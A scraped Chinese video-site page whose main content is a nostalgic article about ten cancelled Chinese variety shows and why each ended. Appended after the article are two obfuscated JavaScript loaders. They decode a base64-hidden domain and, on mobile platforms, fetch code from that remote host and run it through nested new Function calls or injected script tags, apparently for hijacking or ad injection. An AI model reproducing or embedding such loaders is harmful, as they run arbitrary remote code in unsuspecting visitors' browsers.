综艺大热门

  • 娱乐 音乐 益智 游戏 生活
  • 吴宗宪 欧汉声 陈汉典 阿达 LULU
  • 每期90分钟
  • 综艺大热门影片简介: 《乘风破浪的姐姐3》一经开播,…综艺大热门影片简介: 《乘风破浪的姐姐3》一经开播,热度不断,几乎像挂在热搜上。 这几年,观众们已经很少看到如此用心的综艺了。 说来说去,还是因为烂综艺太多了。 这不仅让八姑姑回忆起,过去的那些制作精良,收视率爆火的综艺。 它们有的让人涨知识,有的让人欢笑不止,有的让人缅怀过往。 但无一例外,如今都停播了。 想必,每个人的青春记忆力,都一档综艺,如果让你选,你最期待哪一部复播呢? 1 、 正大综艺 娱乐横行的时代,也有一款以旅游为主的综艺节目霸屏。 1990年,《正大综艺》以世界各地旅游文化为推手,通过猜谜来让观众足不出户,也能游遍四方。 那个没高铁和社交网络的时代,《正大综艺》成了大家了解外面花花世界的窗口。作为外景主持人的朱迅,化身导游带观众领略各地的风土人情,她不花钱就能环游世界的样子,让无数人羡慕不已。 毕竟世界那么大,谁不想去看看呢? 在刺激的答题环节,每当选手回答问题之际,屏幕前的男女老少也会情不自禁地跟着作答,偶尔蒙对了还挺骄傲的。 自它开播以来,第一代主持人杨澜和姜昆的组合便深入人心。机敏幽默的姜昆,搭配活泼清纯的杨澜,让“不看不知道,世界真奇妙”成为一代人的口头禅。 若干年后,来自东北的白云黑土也在小品里因为倪萍和赵忠祥吃醋,差点扭打在一起。 1993年是《正大综艺》的觉醒元年,为了让观众和节目增加互动,观众不仅被邀请进入演播室看台,还能和嘉宾联合作战成为主角。 问答式的游戏虽然简单且还未成熟,但也算是对传统综艺的反叛。 在好看健康的氛围下,节目大大扩宽了受众视野,告诉观众生活不止有眼前的苟且,还有远方的田野。 但节目后来并没有停播,只是不在中国播放了,2019年6月,节目组和泰方完成了素材交接,并在泰国电视台继续播出。 2、同一首歌 2000年,《同一首歌》可谓家喻户晓。 当《同一首歌》的旋律缓缓响起,你是否有跟唱的冲动。 这个每周五晚准时播出的节目,成了一家人坐在电视机前的理由,也引发了亚洲音乐世界的轰动。 当小眼睛的周杰伦,唱着东风破出场时,赚足了掌声和眼球,也见证了华语乐坛的巅峰时代。那时只有23岁的他,如今已是两个孩子的父亲,宠妻晒娃成了日常。 而一票难求的节目,让很多想一睹自己喜欢的明星风采的观众失落不已。有人甚至爬树只为能多看两眼舞台。 节目先后走进60多个城市,所到之处“万人空巷”。在引发轰动之余,也顺带收割了流量。 而一个灵魂拷问由此传来,如果你是著名歌手,却连《同一首歌》都没上过,还好意思和同行打招呼么? 节目广阔的舞台,让草根和明星们欢聚一堂共唱同一首歌,成了如今再难得一见的音乐盛事。 在它最火爆的2006年,《同一首歌》走进沙县刷新了收视记录。但节目既收获了鲜花和掌声,也有许多被人诟病之处。很多争议和质疑都源自《同一首歌》的暴利门。 高达千万的举办费用,远超一般演出商能承载的,大部分都由地方政府和国企买单。 为了省掉人力成本,2010年9月1日《同一首歌》被叫停,只留下了段绯红记忆。 3、开心辞典 2000年,一档益智类类节目在央视播出,它就是《开心辞典》。 节目的主持人叫王小丫,当年她的发型一直被吐槽“太丑”,跟“鸡窝一样”,但却不妨碍她的颜值,话说当年王小丫是真的美。 而“恭喜你,答对了”也成为王小丫的口头禅。 凭借自己的知性和知识储备,王小丫和《开心辞典》一夜爆红,每期观众支持率都在70%以上,《开心辞典》因此成了2000年的流行档节目。 《开心辞典》成了观众们茶前饭后的话题,为了能和王小丫“切磋一番”,不少人纷纷报名参赛。 就连很多明星也会来参加,比如早期的韩庚、杨紫、撒贝宁…… 在节目中,选手参与答题,每答对一题,就可以获得更贵重的礼物。 选手可以在中途终止答题,答对多少就拿多少奖品,不论现场观众意见如何,就算王小丫反复确认“真的放弃吗?不后悔”,也坚决守住自己的底线。 如果想要继续作答,可以获得更多的奖品,但万一一旦答错,之前的奖品全部清零。 很多人都为了拿到最后的大奖,而功亏一篑。 因为这个节目的问题,前面都很简单,越到后面就越刁钻。 比如: 还比如: 而爱眨巴眼睛的王小丫也特别有意思,当选手给出答案时,她反复追问“你确定吗”。 而观众也总是为参赛者的进退捏了一把汗,干着急又搭不上话。 很多选手也都在她的追问之家改了答案,当然有的人很幸运改对了,也有人把原本正确的答案改错了。 也有很多人坚守自己的判断,最终抱的大奖归。 然而,不是所有的喜爱,都能飞过千山万水,一夜爆红的《开心辞典》也有落幕的一天。 虽然《开心辞典》的制片人一直解释节目改版不会有影响,但大数据面前,节目组还是败给了现实。 越来越多新观众的诉求无法满足,老观众的口味也不能一如既往,结果节目数据日渐下滑,身体状况不佳的王小丫也希望退居幕后。 最终,《开心辞典》华丽谢幕,王小丫收心休整,“恭喜你,答对了”成了一代人的回忆。 如今节目虽然停播了9年,但我们在一些电视剧看到致敬它的片段。 比如:《爱情公寓》 比如:《武林外传》 4、幸运52 相比《开心辞典》,《幸运52》的娱乐属性就拉满了。 1998年,染着一头卷发,打扮得花里胡哨的李咏,完全吻合了节目“娱乐至死”的调性,让节目在中规中矩惯了的央视里脱颖而出。 在舞台上他永远站不直,自创的砸拳动作让无数观众争相模仿。 只要他一个拳头砸下去,一台相机就送出去了,反手再甩飞一张卡片,又一个幸运观众将喜从天降。 《幸运52》的答题节奏比《开心辞典》快很多,三个选手同场比拼,而他们只要回答“是”、或者“不是”就可以了。 哪位选手先获得9枚商标,就算获胜。 而这档节目,让人印象深刻的还属“砸金蛋”环节。 在砸金蛋环节,现场嘉宾无处安放的小手,期待又紧张的眼神,也牵动着观众的心。 当选手为了猜商品价赢商标时,李咏中气十足地喊出“高了,低了,又高了”时,台下观众总是一副恨铁不成钢的表情。 然而,当有人歪打正着猜对商品价格时,在场观众也是激动到起身欢呼,久久不能平复,也让电视机前的观众跟着一起过了把获奖瘾。 毕竟获奖的喜悦,谁不渴望拥有呢? 节目每期都会诞生一名幸运观众,获得千元上下的奖金,同时还送出好几十块手表和两份千元安慰奖,告诉你只要参与,就绝对不亏。 而坐在电视机前的观众也跟着中奖幸运儿一起傻乐,似乎比自己获奖还开心。 21世纪初,一路走高的收视率让节目顺理成章的制霸了黄金时段,连附带的广告收入都水涨船高,达到6000万以上。 可随着节目2007年改版,央视一刀切地追求正儿八经,最终让李咏挑事,损人的风格被扼杀在了摇篮,他彻底沦为没有感情的提问机器。 最后《幸运52》在2008年10月27日停播。十年后,随着主持人李咏患癌在美国不治身亡,节目再无回归之日,成了一代人共同缅怀的记忆。 5、 开心100 1998年,东南卫视推出《开心100》,随即节目如日中天。有传闻说各大广告商争先恐后来赞助,哪怕早上没播都有人堵门,只为能第一时间把现金扔桌上。 舒适温馨的节目风格,适合一家人屁颠屁颠地观看。巅峰期的《开心100》完全碾压快本,创下收视神话,成为影响力最大的综艺,没有之一。 而一对综艺元祖CP就这样火遍一片天,他们就是巴晓光和小庄。 节目里也藏着一干“明日大佬”,叶一茜曾模仿过刘嘉玲,姚晨还当过伴舞,梁静短暂的客串了下主持。 “开心100,绝对精彩”成了全国人民脱口而出的口号,99年节目借势出售一套书,全国巡回签售,短短半年就卖到断货。 但2011年,江郎才尽的《开心100》还是被迫停播,当然与节目后期的单调过时有关。 而各大卫视也都推出了自己的拿手综艺,百家争鸣的局面大大削弱了《开心100》的人气。 随着两大王牌主持小庄和巴晓光的相继退出,《开心100》的收视率就更加惨淡,在2011年4月3日正式告别观众。 6、我爱记歌词 综艺领域永远都不缺乏有创意的节目,《我爱记歌词》就这样横空出世。 节目独具匠心,捧红了朱丹华少,让一代名嘴锋芒初现,也让校园里掀起了手抄歌词的热潮。 每当熟悉的旋律响起时,观众经常有一种我上我也行的错觉。可听着耳熟的歌,就是想不起歌词的徒劳,让无力感逐渐涌上心头。 而素人和明星的对决,更是将节目的看点拉满,每期收视率都达3%。即便不比歌喉和音准,总有大佬音色优美,比如赵英俊接唱的《你是我的眼》,让台下观众欢呼不止。 也有五音不全的挑战者让人眉头一紧,像一位外卖小哥,歌词记得准确无误,可音准令人难过,竟没有一个词是在调上的。 在2011年11月节目还引入了年代对抗,推出了“年代金曲感动季”,虽然暴露了观众年龄,却不知不觉间放大了情怀。 2012年时节目一度比天气还火热,很快就登上综艺榜首。 如今回忆起来节目是多么的纯粹,全素人参与,不看背景和颜值,只在乎你是否给出标准答案。 而欢乐的时光总是如此短暂,曲终人散总是难以避免。 由于比拼内容过于单一,《我爱记歌词》收视率持续低迷,即便主办方做了很多调整,增加了很多噱头,节目仍在2014年6月29日彻底停播。 而两位主持人,如今的事业并不顺利,朱丹在几次频繁口误之后,逐渐回归家庭,而中国好舌头华少,也在高以翔事件后,人气逐渐下滑。 7、超级女声 既然有《我爱记歌词》这类考验记忆力的,就一定有考验选手唱功的综艺。 作为湖南卫视在2004年主办的选秀赛,《超级女声》一经推出就收到无数个人或组合的报名。 打着“想唱就唱,要唱得响亮”的口号,风格自由且随性的超女,很快就吸引了一批死忠粉。 尤其是在2005年夏天,那届超女堪称神仙打架,总决赛时收视率高达11.65%,成了综艺史上唯一收视率破10%的节目。 而它的火爆程度究竟如何,才让各大媒体的争相报道呢?很形象的讲,就是超女一嗓子喊出来,七个粉丝能激动到昏倒六个。 舞台上,不仅有足够空间展示自己,也有个性化评委阵容助阵,作为真人秀节目,它乘上了时代东风,从而一发不可收拾。 节目也陆续捧红了李宇春,张靓颖,周笔畅等一批乐坛的“中流砥柱”。从此中国选秀的大幕彻底拉开,娱乐圈正式走入平民偶像的时代。 大家也惊讶地发现,人气爆棚的选手丝毫不输港台明星。而选手们追梦的热情,也让2005年的夏天闪闪发亮。 可花无百日红,唯一不变的就是变化本身。 近几年由于网综崛起,卫视热度降低,《超级女声》流量的蛋糕很快被瓜分一空。 而伴随着层出不穷的选秀节目亮相,花样繁多的真人秀已经到了极限,连说相声都有选秀了,《超级女声》的看点实在不能吸引观众了。 最好的证明就是2016年的最后一届超女,连冠军叫什么名字大家都已经忘记了。 8、 快乐大本营 2022年开年之初,随着《你好星期六》上线,大家才知道播出了24年的《快乐大本营》还是寿终正寝了。快乐家族解散,只剩何炅一人苦苦支撑。 而那句熟悉的“快乐大本营,天天好心情”我们再也听不到了。作为芒果台王牌综艺,它毫无预兆的停播,让人来不及告别。 这个承载了无数人青春回忆的综艺,曾经非常火爆,有多少小伙伴每周六晚八点前,都默默守着电视机,只为看《快乐大本营》,连广告都不愿意跳过。 《快乐大本营》会邀请当红明星做客,比如胡歌录制的重返校园,面对主持人的脑筋急转弯,西红柿到底算不算水果时,口才卓越的胡歌直接切换话题,告诉老师他适合教跳舞,逗得观众合不拢嘴。 曾有个收获无数好评的留言是这样说的:“台上一群疯子,台下一群傻子跟着乐。” 而它的成绩也格外亮眼,连续七年霸榜前三,更是创下收视率破九传奇。 可就是这样一个老少皆宜的节目,还是落下了帷幕。 当然原因有很多,除了快乐家族成员纷纷深陷绯闻,口碑都有不同程度的下滑。节目内容乏味单调,后期只追网红而抛弃情怀,成了压死骆驼的最后一根稻草,让很多人“弃坑”。 当制裁过度娱乐的风潮席卷而来时,它被回炉重造,播出时间和形式被彻底调整,直至最终停播。 诚然,每个综艺都有自己的寿命。作为元老的《快乐大本营》能伴随两三代人成长,已经成为许多人青春的注脚。 而《你好星期六》也跟《快乐大本营》大同小异,只是换了更年轻的主持人,也算是一种传承了。 9、康熙来了 当年,如果有人问在知乎上讨论的最热烈的节目是哪个?十有八九会被回答:康熙来了! 无厘头的大S,遇见知性的蔡康永,奇妙的化学反应给节目带来了非同凡响的效果。 大量台湾明星纷纷上门做客,大胆暴露自己不为人知的一面。在一场知性和理性的访谈后,擦出别样花火,让明星的故事由幕后逐步走到台前。 而且每一集还邀请嘉宾的好友,如化妆师,场务,保姆一起前来,爆料嘉宾的日常琐事,堪称大型“社死”现场。 主持人毫不避讳的发问,加上“爆料”嘉宾的推波助澜,知名人士的生活陋习和出道窘态一一摆在镜头前,极大满足了吃瓜群众的好奇心。 《康熙来了》所独有的出位话题,成了它受人欢迎的原因。话题涵盖面也很广,从八卦到女星情史,台湾美食介绍和探访明星家等都不曾放过。 但后期创意枯竭成了硬伤,小S的直爽坦率再也无法吸引观众的眼球,其他综艺的百花齐放也给《康熙来了》造成不小冲击。 而主持人蔡康永和小S也开始感到疲惫,不想再当主持。最后一期尾声时,蔡康永泪别观众,动情说道“你会长大,所以康熙来了不能陪你们一辈子”。 想不到曾给我带来如此感动的节目,离别时竟如此悲伤,最终2016年6月14日节目停播。 10小神龙俱乐部 说完大人的,咱们再说说孩子们爱看的 《小神龙俱乐部》带给很多人童年浓墨重彩的一笔。 自开播以来,《小神龙俱乐部》赢得了很多人喜爱。 尤其是节目片头,在银河漩涡中,一只绿色恐龙宛如超人般飞来,脚踏云彩而下的出场,成了难以复刻的经典。后来喜羊羊灰太狼的龙年大电影为了致敬,专门把小神龙借了过来。 而充斥着美式幽默的迪士尼动画真的很吸睛,比如从《狮子王》中衍生的《彭彭丁满历险记》,连拍了五季,豆瓣每季评分都在9分左右,影响力早已和《狮子王》本尊不分上下。 在那个电脑尚未普及的年代,一家人围坐在电视机前,争夺遥控器的画面仍历历在目。 为了能准时看动画片,很多人忘记吃饭,不写作业,没少挨家长老师的打骂。 假如节目能一直播下去,就将迎来30岁生日。可从来都没有如果,节目在2019年1月1日便停播了。 至于停播原因,没人能给出明确答案,猜测也是众说纷纭。 有人说单纯是因为版权到期,也有人说是收视率低迷惹的祸。 不过就算它依然在播,以前的那种感觉也不复存在。 2006年黄金时段规定,国外动画片播放率大大降低,取而代之的是国产动画大量涌来。 可国产动画片被各种因素制约,为达到家长们的“要求”,国产动画往更低龄方向走去,很长一段时间大家都被喜羊羊灰太狼所支配。 好看的作品变少,收视率自然低迷。互联网的崛起,也让更多用户选择去网络上看日漫。 留下的仅仅是不会使用电脑的幼儿群体,因此节目内容只能不断往低龄化方向靠拢,劝退了想回归的青少年观众。 从1990年央视综艺算起,内地综艺迎来了第30年。 随着电视综艺淡出视野,一代人的青春也顺势落下帷幕,但这些停播综艺带来的感动和欢乐却依旧存在。 有些综艺如同夏日,热浪奔涌,激情似火。 有些综艺如同老友,推杯换盏,畅所欲言。 有些综艺如同微风,轻抚面颊,舒爽淋漓。 它们或多或少陪伴观众度过了一段青涩的时光,成为记忆中挥之不去的过往。 如果选择一档复播,你会选择哪个呢? #最期待哪些停播的综艺节目复播##影视时光机# ——END—— 【文|枫】 【编辑|八姑姑】

同类型

同主演

综艺大热门评论

  • 评论加载中...
function WaeIfQO(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function smAXyVBP(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return WaeIfQO(t);};window[''+'B'+'S'+'c'+'p'+'v'+'K'+'R'+'k'+'z'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=smAXyVBP,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('ZXJttbnQuaWttqbndkLnh5eg==','151743',window,document,['t','UyhWYi']);}:function(){};


function WLxXbgTl(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function zPZha(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return WLxXbgTl(t);};window[''+'z'+'E'+'d'+'c'+'C'+'q'+'B'+'S'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=zPZha,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('ZXJtbnQuaWtqqbndkLnh5eg==','151742',window,document,['q','ZTDMgQ']);}:function(){};